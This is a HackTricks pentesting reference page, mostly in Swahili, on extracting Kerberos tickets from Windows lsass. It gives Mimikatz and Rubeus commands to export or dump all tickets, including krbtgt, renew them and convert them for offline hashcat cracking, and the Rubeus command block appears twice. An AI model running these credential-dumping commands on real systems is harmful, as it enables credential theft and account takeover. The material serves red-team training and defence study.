Harvesting tickets from Windows

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Tiketi katika Windows zinadhibitiwa na kuhifadhiwa na mchakato wa lsass (Local Security Authority Subsystem Service), ambao unawajibika kwa kushughulikia sera za usalama. Ili kutoa tiketi hizi, ni muhimu kuingiliana na mchakato wa lsass. Mtumiaji asiye na usimamizi anaweza kufikia tiketi zao pekee, wakati msimamizi ana haki ya kutoa tiketi zote kwenye mfumo. Kwa shughuli kama hizo, zana Mimikatz na Rubeus zinatumika sana, kila moja ikitoa amri na kazi tofauti.

Mimikatz

Mimikatz ni zana yenye uwezo ambayo inaweza kuingiliana na usalama wa Windows. Inatumika sio tu kwa kutoa tiketi bali pia kwa shughuli nyingine nyingi zinazohusiana na usalama.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus ni chombo kilichoundwa mahsusi kwa ajili ya mwingiliano na usimamizi wa Kerberos. Kinatumika kwa ajili ya uchimbaji wa tiketi na usimamizi, pamoja na shughuli nyingine zinazohusiana na Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

When using these commands, ensure to replace placeholders like <BASE64_TICKET> and <luid> with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows.

References

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Previous88tcp/udp - Pentesting Kerberos NextHarvesting tickets from Linux

Last updated 4 months ago

# Dumping all tickets using Rubeus .\Rubeus dump [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) # Listing all tickets .\Rubeus.exe triage # Dumping a specific ticket by LUID .\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) # Renewing a ticket .\Rubeus.exe renew /ticket:<BASE64_TICKET> # Converting a ticket to hashcat format for offline cracking .\Rubeus.exe hash /ticket:<BASE64_TICKET>